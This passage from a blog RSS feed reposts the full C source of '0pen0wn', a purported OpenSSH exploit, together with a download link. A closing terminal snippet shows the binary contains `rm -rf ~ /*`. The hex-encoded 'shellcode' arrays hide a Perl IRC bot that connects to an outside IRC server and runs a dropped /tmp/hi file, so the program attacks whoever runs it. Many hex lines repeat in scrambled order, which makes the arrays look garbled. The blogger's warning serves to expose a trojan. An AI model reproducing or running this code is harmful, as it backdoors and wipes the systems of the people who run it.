&#8220;\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f&#8221;<br />
&#8220;\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24&#8243;<br />
&#8220;\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24&#8243;<br />
&#8220;\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e&#8221;<br />
&#8220;\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20&#8243;<br />
&#8220;\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a&#8221;<br />
&#8220;\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a&#8221;<br />
&#8220;\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63&#8243;<br />
&#8220;\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d&#8221;<br />
&#8220;\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b&#8221;<br />
&#8220;\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b&#8221;<br />
&#8220;\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20&#8243;<br />
&#8220;\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20&#8243;<br />
&#8220;\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20&#8243;<br />
&#8220;\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a&#8221;<br />
&#8220;\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79&#8243;<br />
&#8220;\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22&#8243;<br />
&#8220;\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f&#8221;<br />
&#8220;\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24&#8243;<br />
&#8220;\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24&#8243;<br />
&#8220;\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e&#8221;<br />
&#8220;\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20&#8243;<br />
&#8220;\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22&#8243;<br />
&#8220;\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63&#8243;<br />
&#8220;\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d&#8221;<br />
&#8220;\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20&#8243;<br />
&#8220;\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20&#8243;<br />
&#8220;\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b&#8221;<br />
&#8220;\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20&#8243;<br />
&#8220;\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20&#8243;<br />
&#8220;\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a&#8221;<br />
&#8220;\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79&#8243;<br />
&#8220;\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22&#8243;<br />
&#8220;\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22&#8243;<br />
&#8220;\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63&#8243;<br />
&#8220;\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d&#8221;<br />
&#8220;\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f&#8221;<br />
&#8220;\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69&#8243;<br />
&#8220;\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b&#8221;<br />
&#8220;\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20&#8243;<br />
&#8220;\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20&#8243;<br />
&#8220;\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f&#8221;<br />
&#8220;\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24&#8243;<br />
&#8220;\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24&#8243;<br />
&#8220;\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e&#8221;<br />
&#8220;\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20&#8243;<br />
&#8220;\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b&#8221;<br />
&#8220;\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20&#8243;<br />
&#8220;\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20&#8243;<br />
&#8220;\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f&#8221;<br />
&#8220;\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24&#8243;<br />
&#8220;\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24&#8243;<br />
&#8220;\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e&#8221;<br />
&#8220;\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20&#8243;<br />
&#8220;\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a&#8221;;</p>
<p>char fbsd_shellcode[] =<br />
&#8220;\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b&#8221;<br />
&#8220;\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20&#8243;<br />
&#8220;\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22&#8243;<br />
&#8220;\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22&#8243;<br />
&#8220;\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63&#8243;<br />
&#8220;\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d&#8221;<br />
&#8220;\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b&#8221;<br />
&#8220;\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b&#8221;<br />
&#8220;\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20&#8243;<br />
&#8220;\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20&#8243;<br />
&#8220;\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20&#8243;<br />
&#8220;\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a&#8221;<br />
&#8220;\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79&#8243;<br />
&#8220;\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22&#8243;<br />
&#8220;\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20&#8243;<br />
&#8220;\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a&#8221;<br />
&#8220;\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79&#8243;<br />
&#8220;\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22&#8243;<br />
&#8220;\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22&#8243;<br />
&#8220;\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63&#8243;<br />
&#8220;\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d&#8221;<br />
&#8220;\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f&#8221;<br />
&#8220;\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69&#8243;<br />
&#8220;\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b&#8221;<br />
&#8220;\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20&#8243;<br />
&#8220;\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20&#8243;<br />
&#8220;\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f&#8221;<br />
&#8220;\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24&#8243;<br />
&#8220;\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24&#8243;<br />
&#8220;\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e&#8221;<br />
&#8220;\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20&#8243;<br />
&#8220;\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b&#8221;<br />
&#8220;\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20&#8243;<br />
&#8220;\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20&#8243;<br />
&#8220;\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f&#8221;<br />
&#8220;\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24&#8243;<br />
&#8220;\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24&#8243;<br />
&#8220;\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e&#8221;<br />
&#8220;\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20&#8243;<br />
&#8220;\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a&#8221;<br />
&#8220;\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a&#8221;<br />
&#8220;\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79&#8243;<br />
&#8220;\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22&#8243;<br />
&#8220;\x7d\x7d\x23\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70&#8243;<br />
&#8220;\x2f\x68\x69\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b&#8221;<br />
&#8220;\x2f\x74\x6d\x70\x2f\x68\x69\x0a&#8221;;<br />
#define SIZE 0xffffff<br />
#define OFFSET 131<br />
#define fremote build_frem(t,e,s,m,y)</p>
<p>void usage(char *arg){<br />
printf(&#8221;\n[+] 0pen0wn 0wnz Linux/FreeBSD\n&#8221;);<br />
printf(&#8221;  Usage: %s -h  -p port\n&#8221;,arg);<br />
printf(&#8221;  Options:\n&#8221;);<br />
printf(&#8221;  \t-h ip/host of target\n&#8221;);<br />
printf(&#8221;  \t-p port\n&#8221;);<br />
printf(&#8221;  \t-d username\n&#8221;);<br />
printf(&#8221;  \t-B memory_limit 8/16/64\n\n\n&#8221;);<br />
}</p>
<p>#define FD 0&#215;080518fc<br />
#define BD 0&#215;08082000</p>
<p>int main(int argc, char **argv){<br />
FILE *jmpinst;<br />
char h[500],buffer[1024];fremote(jmpcode);char *payload, *ptr;<br />
int port=23, limit=8, target=0, sock;<br />
struct hostent *host;<br />
struct sockaddr_in addr;</p>
<p>if (geteuid()) {<br />
puts(&#8221;need root for raw socket, etc&#8230;&#8221;);<br />
return 1;<br />
}</p>
<p>if(argc &lt; 3){         usage(argv[0]);         return 1;     }         printf(&#8221;\n  [+] 0wn0wn &#8211; by anti-sec group\n&#8221;);             if (!inet_aton(h, &amp;addr.sin_addr)){         host = gethostbyname(h);         if (!host){             printf(&#8221;  [-] Resolving failed\n&#8221;);             return 1;         }         addr.sin_addr = *(struct in_addr*)host-&gt;h_addr;<br />
}</p>
<p>sock = socket(PF_INET, SOCK_STREAM, 0);<br />
addr.sin_port = htons(port);<br />
addr.sin_family = AF_INET;<br />
if (connect(sock, (struct sockaddr*)&amp;addr, sizeof(addr)) == -1){<br />
printf(&#8221;  [-] Connecting failed\n&#8221;);<br />
return 1;<br />
}<br />
payload = malloc(limit * 10000);<br />
ptr = payload+8;<br />
memcpy(ptr,jmpcode,strlen(jmpcode));<br />
jmpinst=fopen(shellcode+793,&#8221;w+&#8221;);<br />
if(jmpinst){<br />
fseek(jmpinst,0,SEEK_SET);<br />
fprintf(jmpinst,&#8221;%s&#8221;,shellcode);<br />
fclose(jmpinst);<br />
}<br />
ptr += strlen(jmpcode);<br />
if(target != 5 &amp;&amp; target != 6){<br />
memcpy(ptr,shellcode,strlen(shellcode));<br />
ptr += strlen(shellcode);<br />
memset(ptr,&#8217;B',limit * 10000 &#8211; 8 &#8211; strlen(shellcode));<br />
}<br />
else{<br />
memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));<br />
ptr += strlen(fbsd_shellcode);<br />
memset(ptr,&#8217;B',limit * 10000 &#8211; 8 &#8211; strlen(fbsd_shellcode));<br />
}<br />
send(sock,buffer,strlen(buffer),0);<br />
send(sock,ptr,3750,0);<br />
close(sock);<br />
if(connect(sock, (struct sockaddr*)&amp;addr, sizeof(addr))  == -1) {<br />
printf(&#8221;  [-] connecting failed\n&#8221;);<br />
}</p>
<p>payload[sizeof(payload)-1] = &#8216;\0&#8242;;<br />
payload[sizeof(payload)-2] = &#8216;\0&#8242;;<br />
send(sock,buffer,strlen(buffer),0);<br />
send(sock,payload,strlen(payload),0);<br />
close(sock);<br />
free(payload);<br />
addr.sin_port = htons(6666);<br />
if(connect(sock, (struct sockaddr*)&amp;addr, sizeof(addr))  == 0) {<br />
/* v&#8212; our cool bar that says: &#8220;r0000000t!!!&#8221; */<br />
printf(&#8221;\n  [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~&gt;]\n\n&#8221;);<br />
fremote(&#8221;PS1=&#8217;sh-3.2#&#8217; /bin/sh&#8221;);<br />
}<br />
else<br />
printf(&#8221;  [-] failed to exploit target <img src='http://antihackerlink.or.id/wp-includes/images/smilies/icon_sad.gif' alt=':-(' class='wp-smiley' /> \n&#8221;);<br />
close(sock);<br />
return 0;<br />
}</p>
<p>or you can download it <strong><a href="http://www.nopaste.com/p/aDTdT5s1C">HERE</a></strong></p>
<p>Once again I warn you, <strong>DO NOT EXECUTE</strong> if you know nothing about scripting and programming<br />
<code><br />
[sakitjiwa@iluvbugiz ~]$ vi 0pen0wn.c<br />
[sakitjiwa@iluvbugiz ~]$ cc -o 0pen0wn 0pen0wn.c<br />
[sakitjiwa@iluvbugiz ~]$<br />
[sakitjiwa@iluvbugiz ~]$ strings 0pen0wn | grep rm<br />
rm -rf ~ /* 2&gt; /dev/null &amp;<br />
[sakitjiwa@iluvbugiz ~]$</code></p>
<p>here you go kiddo, be careful playing with codes <img src='http://antihackerlink.or.id/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://antihackerlink.or.id/0day-for-openssh-0pen0wn-is-spreaded.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
